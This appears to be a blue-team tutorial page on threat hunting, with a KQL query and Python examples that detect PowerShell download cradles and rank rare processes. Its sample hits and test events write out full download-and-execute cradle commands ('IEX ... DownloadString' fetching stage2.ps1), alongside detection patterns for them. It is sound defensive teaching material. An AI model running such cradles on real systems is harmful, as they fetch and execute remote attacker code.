Advanced Defense (Blue Team)
Threat Hunting — Proactive Threat Search
Threat hunting is the proactive, human-driven search for threats that slipped past automated tools. Instead of waiting for an alert, the analyst forms hypotheses based on threat intelligence and goes after the data.
Why hunt?
Automated tools detect known patterns. Sophisticated attackers use novel techniques or live off the land, abusing binaries already present on the host (LOLBins) that signature-based tools rarely flag. An experienced hunter finds what the SIEM has no rule for yet.
The threat hunting loop
1. Hypothesis
│
▼
2. Data collection ──► logs, EDR telemetry, PCAP, AD events
│
▼
3. Investigation ──► queries, scripts, visualization
│
▼
4. Discovery ──► TTP confirmed or hypothesis discarded
│
▼
5. Response / new detection rule
Hypothesis sources
- CTI (Cyber Threat Intelligence): APT group reports, IoC feeds.
- MITRE ATT&CK: “Is T1059 (Command and Scripting Interpreter) being abused here?”
- Internal anomalies: unusual host making high-volume DNS lookups.
- Previous incidents: attacker may have left traces beyond what was remediated.
Hunt example: suspicious PowerShell
Hypothesis: “An attacker is using PowerShell with a download cradle to execute code in memory.”
Query (Elastic KQL):
process.name: "powershell.exe"
AND process.command_line: (*DownloadString* OR *IEX* OR *Invoke-Expression*)
AND NOT process.parent.name: ("sccm.exe" OR "wsus.exe")
Two caveats: wildcard matches on a keyword field are case-sensitive, so *IEX* will not match iex (query the analyzed .text sub-field or add case variants); and the excluded parent names are placeholders that must be replaced with the actual process names of the environment's software-deployment agents, otherwise the exclusion is either useless or hides legitimate hits.
Result:
host: WIN-DEV-03
user: pedro.silva
cmd: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.99/stage2.ps1')"
timestamp: 2026-06-24T03:17:42Z
Execution at 03:17 with a hidden window, pulling a second stage from an internal IP (which points to an already-compromised staging host). High suspicion: escalate to IR.
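The same hunt expressed as runnable detection logic, added here as an example and not taken from the original page. It applies the hypothesis above (PowerShell plus a download-cradle token, management-agent parents excluded) to a few constructed process-creation events and then records the triage context the analyst read off the hit: hidden window, off-hours execution, and download from a private address. The tokens iwr and Invoke-WebRequest, the parent name CcmExec.exe, the quiet-hours window and all hosts, users and commands are assumptions for the example.

```python
"""Hunt for PowerShell download cradles over process-creation events.

Added example, not part of the original page: applies the hunt hypothesis
(IEX + DownloadString cradle, management agents excluded) to constructed
ECS-style events so the logic can be run offline.
"""
import re
from datetime import datetime, timezone
from ipaddress import ip_address

# Constructed sample telemetry (ECS-like field names). Hosts, users,
# parents and command lines are made up for this example.
EVENTS = [
    {"host": "WIN-DEV-03", "user": "pedro.silva", "process": "powershell.exe",
     "parent": "explorer.exe",
     "cmd": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://192.168.10.99/stage2.ps1')\"",
     "ts": "2026-06-24T03:17:42Z"},
    {"host": "WIN-FIN-11", "user": "ana.costa", "process": "powershell.exe",
     "parent": "explorer.exe",
     "cmd": "powershell -c \"iex (iwr http://cdn.example.net/a.ps1 -UseBasicParsing).Content\"",
     "ts": "2026-06-24T14:02:10Z"},
    {"host": "WIN-SRV-01", "user": "SYSTEM", "process": "powershell.exe",
     "parent": "CcmExec.exe",  # assumed management agent, treated as benign
     "cmd": "powershell -File C:\\Windows\\CCM\\Inventory.ps1",
     "ts": "2026-06-24T02:00:00Z"},
    {"host": "WIN-DEV-07", "user": "joao.lima", "process": "powershell.exe",
     "parent": "code.exe",
     "cmd": "powershell -c \"Get-ChildItem C:\\repo | Measure-Object\"",
     "ts": "2026-06-24T10:15:00Z"},
]

# Cradle indicators, matched case-insensitively because attackers vary case
# (a keyword-field wildcard in KQL would not catch 'iex'). iwr and
# Invoke-WebRequest are added beyond the page's three tokens (assumption).
CRADLE = re.compile(r"DownloadString|Invoke-Expression|\bIEX\b|Invoke-WebRequest|\biwr\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
URL = re.compile(r"https?://([^/\s'\"]+)", re.I)
EXCLUDED_PARENTS = {"ccmexec.exe"}  # tune to the environment's real agents
OFF_HOURS = range(0, 6)             # 00:00-05:59 UTC, assumed quiet window


def matches_hypothesis(ev):
    """Equivalent of the KQL filter: powershell + cradle token, parent not excluded."""
    return (ev["process"].lower() == "powershell.exe"
            and CRADLE.search(ev["cmd"]) is not None
            and ev["parent"].lower() not in EXCLUDED_PARENTS)


def triage_reasons(ev):
    """Context that raises suspicion, mirroring the analyst's reading of the hit."""
    reasons = []
    if HIDDEN.search(ev["cmd"]):
        reasons.append("hidden window")
    ts = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    if ts.hour in OFF_HOURS:
        reasons.append("off-hours execution")
    for m in URL.finditer(ev["cmd"]):
        host = m.group(1).split(":")[0]
        try:
            if ip_address(host).is_private:
                reasons.append("download from internal IP (possible staging host)")
        except ValueError:  # not an IP literal, so a hostname
            reasons.append(f"download from external host {host}")
    return reasons


def hunt(events):
    """Return (event, reasons) for every hit, most context-rich first."""
    hits = [(ev, triage_reasons(ev)) for ev in events if matches_hypothesis(ev)]
    return sorted(hits, key=lambda h: len(h[1]), reverse=True)


if __name__ == "__main__":
    for ev, reasons in hunt(EVENTS):
        print(f"{ev['ts']} {ev['host']:<11} {ev['user']:<12} {', '.join(reasons) or 'cradle only'}")
        print(f"    {ev['cmd']}")
```

Running it lists WIN-DEV-03 first with three reasons and WIN-FIN-11 second with one; the CcmExec.exe child and the harmless developer command produce no hit. The reasons list is what goes into the escalation note, so the IR team gets the analyst's context and not just the raw command line.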
Analysis techniques
- Stack counting: group by field and look for outliers (e.g., rare child processes of winword.exe).
- Frequency analysis: processes appearing on few hosts are more suspicious.
- Timeline analysis: sort a host’s events by time to see the execution chain.
- Graph analysis: map lateral connections between compromised hosts.
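Stack counting and frequency analysis carried out in code, added here as an example rather than taken from the original page. Constructed process-creation events (host, parent, child) are skewed so that one rare child of winword.exe stands out, and each child process is then counted by the number of distinct hosts it ran on so that low-prevalence binaries rise to the top of the review list. Host names, process names and the 5% prevalence threshold are assumptions for the example.

```python
"""Stack counting and host-frequency analysis over process-creation events.

Added example, not part of the original page. Groups constructed events by
(parent, child) to surface rare children of winword.exe, then counts on how
many hosts each child process appears.
"""
from collections import Counter, defaultdict

# Constructed telemetry: (host, parent process, child process).
# Volumes are deliberately skewed so that one pair stands out.
EVENTS = (
    [("WIN-FIN-%02d" % i, "winword.exe", "splwow64.exe") for i in range(1, 41)]
    + [("WIN-FIN-%02d" % i, "winword.exe", "msedge.exe") for i in range(1, 13)]
    + [("WIN-FIN-22", "winword.exe", "cmd.exe"),          # the outlier chain
       ("WIN-FIN-22", "cmd.exe", "powershell.exe"),
       ("WIN-FIN-22", "powershell.exe", "rundll32.exe")]
    + [("WIN-FIN-%02d" % i, "explorer.exe", "outlook.exe") for i in range(1, 41)]
)


def stack_children(events, parent):
    """Stack count: child processes of `parent`, rarest first."""
    counts = Counter(child for _, p, child in events if p.lower() == parent.lower())
    return sorted(counts.items(), key=lambda kv: kv[1])


def host_prevalence(events):
    """Frequency analysis: number of distinct hosts each child process ran on."""
    hosts = defaultdict(set)
    for host, _, child in events:
        hosts[child.lower()].add(host)
    return {child: len(h) for child, h in hosts.items()}


def rare_processes(events, total_hosts, max_fraction=0.05):
    """Processes seen on at most `max_fraction` of the fleet: the hunt's review list."""
    prev = host_prevalence(events)
    return sorted(p for p, n in prev.items() if n / total_hosts <= max_fraction)


if __name__ == "__main__":
    print("children of winword.exe (rarest first):")
    for child, n in stack_children(EVENTS, "winword.exe"):
        print(f"  {n:>4}  {child}")
    fleet = len({h for h, _, _ in EVENTS})
    print(f"rare processes (<=5% of {fleet} hosts):", rare_processes(EVENTS, fleet))
```

The stack puts cmd.exe spawned by winword.exe at the top with a single occurrence, against 40 for the print helper splwow64.exe, and the prevalence pass isolates the three binaries of the chain on WIN-FIN-22. Both views point at the same host, which is the cue to pivot to timeline analysis on it.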
Hunter tools
| Tool | Use |
|---|---|
| Elastic / KQL | Log and EDR queries |
| Velociraptor | Large-scale telemetry collection |
| osquery | SQL over system state |
| Zeek | Network traffic analysis |
| YARA | Malware hunting in files |
Documenting the hunt
Every hunt should produce an artifact:
Hunt Report:
Hypothesis: use of LOLBins for AV evasion
Period: 2026-06-01 to 2026-06-25
Sources: Windows Event Logs, EDR telemetry
Result: negative (hypothesis discarded)
New rule created: yes — alert on certutil.exe invoked with the -urlcache download option
Hunts that find nothing also have value: they increase confidence in the environment and generate new detection rules.